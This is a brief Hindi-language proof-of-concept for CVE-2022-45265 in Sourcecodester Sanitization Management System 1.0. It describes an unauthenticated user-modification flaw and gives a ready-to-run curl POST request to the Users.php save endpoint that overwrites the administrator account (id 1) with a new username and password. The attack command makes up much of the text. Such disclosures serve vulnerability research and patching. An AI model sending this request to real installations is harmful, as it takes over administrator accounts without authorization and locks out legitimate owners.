
CVE-2022-45265 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Sourcecodester Sanitization Management System 1.0 को लक्षित करता है, जो बिना प्रमाणीकरण के उपयोगकर्ता संशोधन के माध्यम से POST अनुरोध से सेव एंडपॉइंट पर किया जाता है।
sourcecodester.com द्वारा वितरित स्वच्छता प्रबंधन प्रणाली (1.0) में
curl --location --request POST 'http://localhost/php-sms/classes/Users.php?f=save' \
--form 'id="1"' \
--form 'firstname="HACKED"' \
--form 'lastname="Administrator"' \
--form 'username="admin"' \
--form 'password="maikroservicewashere"'